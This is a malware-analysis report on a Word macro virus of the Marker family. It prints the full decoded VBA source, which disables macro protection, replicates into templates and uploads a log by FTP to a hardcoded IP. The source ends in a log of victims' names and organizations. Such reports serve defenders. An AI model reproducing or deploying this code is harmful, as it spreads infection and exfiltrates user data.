Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 962800772c8d8224…

MALICIOUS

Office (OLE)

120.5 KB Created: 2011-12-27 02:02:00 Authoring application: Microsoft Office Word First seen: 2015-09-18
MD5: 5f305f68b6f01f294ec7e598bead0657 SHA-1: d1d70297257bbdde786eb055d5bc1bb83c60e7c4 SHA-256: 962800772c8d8224f2eba20076d3245d420e928fcdd12d0cad326bed872dd7f5
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1037.001 Image File Execution Options Injection T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros that attempt to disable macro security and replicate themselves. The script also attempts to write to registry keys related to VBA warnings, likely to bypass security prompts. It further attempts to create a file 'c:\netldx.vxd' containing connection details to '209.201.88.110', suggesting it downloads and executes a second-stage payload.

Heuristics 6

  • ClamAV: Doc.Trojan.Marker-31 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-31
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://apps.isiknowledge.com/OneClickSearch.do?product=UA&search_mode=OneClickSearch&db_id=&SID=Q21HC1gmcoEgNG1ABB5&field=AU&value=WU+X In document text (OLE body)
    • http://apps.isiknowledge.com/OneClickSearch.do?product=UA&search_mode=OneClickSearch&db_id=&SID=Q21HC1gmcoEgNG1ABB5&field=AU&value=YIN+YIn document text (OLE body)
    • http://apps.isiknowledge.com/full_record.do?product=UA&search_mode=GeneralSearch&qid=2&SID=S2FEJljKhAhflIg9DHK&page=1&doc=1&colname=DII&cacheurlFromRightClick=noIn document text (OLE body)
    • http://apps.isiknowledge.com/OneClickSearch.do?product=UA&search_mode=OneClickSearch&db_id=&SID=Q21HC1gmcoEgNG1ABB5&field=AU&value=HUANG+R&cacheurlFromRightClick=noIn document text (OLE body)
    • http://apps.isiknowledge.com/OneClickSearch.do?product=UA&search_mode=OneClickSearch&db_id=&SID=Q21HC1gmcoEgNG1ABB5&field=AU&value=HUANG+RIn document text (OLE body)
    • http://apps.isiknowledge.com/OneClickSearch.do?product=UA&search_mode=OneClickSearch&db_id=&SID=Q21HC1gmcoEgNG1ABB5&field=AU&value=LI+TIn document text (OLE body)
    • http://apps.isiknowledge.com/OneClickSearch.do?product=UA&search_mode=OneClickSearch&db_id=&SID=S2FEJljKhAhflIg9DHK&field=AU&value=WU+XIn document text (OLE body)
    • http://apps.isiknowledge.com/OneClickSearch.do?product=UA&search_mode=OneClickSearch&db_id=&SID=S2FEJljKhAhflIg9DHK&field=AU&value=YIN+YIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6588 bytes
SHA-256: dc8d32d394ef1ba7da985cb9ee9d78ba461eebda1cf3e3188d2e70c5c211bc2f
Detection
ClamAV: Doc.Trojan.Marker-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()

On Error Resume Next

Const Marker = "<- this is a marker!"

'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String

'Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)

DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)


'Switch the VirusProtection OFF
Options.VirusProtection = False


  If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then
  
    If DocumentInfected = True Then
      LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
    ElseIf NormalTemplateInfected = True Then
      LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
    End If
    
    LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->"))
    
    For i = 1 To 4
      LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)
    Next i
    LogFile = "C:\hsf" & LogFile & ".sys"
    
    Open LogFile For Output As #1
    Print #1, LogData
    Close #1
    
    Open "c:\netldx.vxd" For Output As #1
    Print #1, "o 209.201.88.110"
    Print #1, "user anonymous"
    Print #1, "pass itsme@"
    Print #1, "cd incoming"
    Print #1, "ascii"
    Print #1, "put " & LogFile
    Print #1, "quit"
    Close #1
    
    Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
    
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True
    
  End If


'Make sure that some conditions are true before we continue infecting anything
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
   (ActiveDocument.SaveFormat = wdFormatDocument Or _
   ActiveDocument.SaveFormat = wdFormatTemplate) Then
   
   
  'Infect the NormalTemplate
  If DocumentInfected = True Then
  
    SaveNormalTemplate = NormalTemplate.Saved
  
    OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)

    
    'Write a log file of this NormalTemplate infection
    For i = 1 To Len(Application.UserAddress)
      If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
        If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
          UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
        End If
      Else
        UserAddress = UserAddress & Chr(13) & "' "
      End If
    Next i

    OurCode = OurCode & Chr(13) & _
              "' " & Format(Time, "hh:mm:ss AMPM - ") & _
                     Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
              "' " & Application.UserName & Chr(13) & _
              "' " & UserAddress & Chr(13)


    nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
    nt.CodeModule.AddFromString OurCode
    
    If SaveNormalTemplate = True Then NormalTemplate.Save
    
  End If


  'Infect the ActiveDocument
  If NormalTemplateInfected = True And _
     (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
     ActiveDocument.Saved = False) Then
  
    SaveDocument = ActiveDocument.Saved
    
    OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)

    ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
    ad.CodeModule.AddFromString OurCode
    
    If SaveDocument = True Then ActiveDocument.Save
      
  End If
  
    
End If

End Sub

' Logfile -->

' 09:08:36  - Saturday, 28 Nov 1998
' SPo0Ky
' Blue Planet
'



' 02:50:31 PM - Saturday, 28 Nov 1998
' MARK B. SEAY
'



' 08:04:45 AM - Friday, 4 Dec 1998
' UPS
'



' 11:43:35 AM - Thursday, 17 Dec 1998
' WRO
'



' 03:07:26 PM - Tuesday, 22 Dec 1998
' BCBSA
'



' 03:28:02 PM - Wednesday, 6 Jan 1999
' BCBSA
'



' 02:59:47 PM - Monday, 11 Jan 1999
' Marsha Veach
'



' 01:54:54 PM - Wednesday, 20 Jan 1999
' Connie Sandifer, CMP
'



' 09:33:06 PM - Monday, 25 Jan 1999
' Doug Rowan
'



' 08:21:12 AM - Wednesday, 27 Jan 1999
' IMSI
'



' 10:59:58 AM - Friday, 29 Jan 1999
' Raj
'



' 03:37:57 PM - Saturday, 30 Jan 1999
' hornd
'



' 01:26:48 PM - Tuesday, 2 Feb 1999
' Cooley Godward
'



' 04:57:29 PM - Tuesday, 2 Feb 1999
' Cooley Godward
'



' 06:35:44 PM - Tuesday, 2 Feb 1999
' Cooley Godward
'



' 04:23:52 PM - Thursday, 4 Feb 1999
' Cooley Godward
'



' 04:27:39 PM - Saturday, 6 Feb 1999
' Cooley Godward
'



' 06:18:06 PM - Monday, 8 Feb 1999
' Cooley Godward
'



' 09:17:17 PM - Tuesday, 9 Feb 1999
' hclee
'



' 04:44:45 PM - Wednesday, 17 Feb 1999
' Dr. W. Hsiao
'                   Wendy Hsiao, Ph.D.



' 04:13:19 PM - Tuesday, 23 Feb 1999
' CCST
'



' 10:09:35 AM - Saturday, 20 Mar 1999
' cpwu
'



' 09:33:49 AM - Thursday, 6 May 1999
' 柳建华
'



' 12:39:25 PM - Tuesday, 20 May 1997
' ghc-bbc
'



' 01:21:36 PM - Friday, 7 May 1999
' 李晋闽
'



' 05:51:53  - Wednesday, 12 May 1999
' qdzhuang
'



' 03:23:04 PM - Saturday, 19 Jun 1999
' 李晋闽
'



' 02:53:46 下午 - Tuesday, 6 Sep 2011
' 李晋闽
'



' 09:37:47 上午 - Monday, 19 Sep 2011
' 张士力
'



' 01:41:54 下午 - Monday, 26 Sep 2011
' unknown
'



' 10:50:02 上午 - Wednesday, 19 Oct 2011
' 祝昊泉
'



' 08:27:05 上午 - Wednesday, 26 Oct 2011
' 迟文倩
'



' 10:37:36 上午 - Monday, 31 Oct 2011
' 蒋运枫
'



' 04:21:38 下午 - Monday, 31 Oct 2011
' 李彩梅
'



' 08:15:53 上午 - Wednesday, 2 Nov 2011
' 张会芳
'



' 10:26:39 上午 - Monday, 14 Nov 2011
' unknown
'



' 07:31:07 下午 - Friday, 2 Dec 2011
' 陈改学
'



' 09:39:08 下午 - Monday, 5 Dec 2011
' 杨萍
'



' 10:35:11 上午 - Thursday, 15 Dec 2011
' 文再坤
'



' 02:23:35 下午 - Thursday, 15 Dec 2011
' unknown
'



' 04:25:18 下午 - Sunday, 18 Dec 2011
' unknown
'



' 10:45:54 下午 - Thursday, 22 Dec 2011
' 吴信
'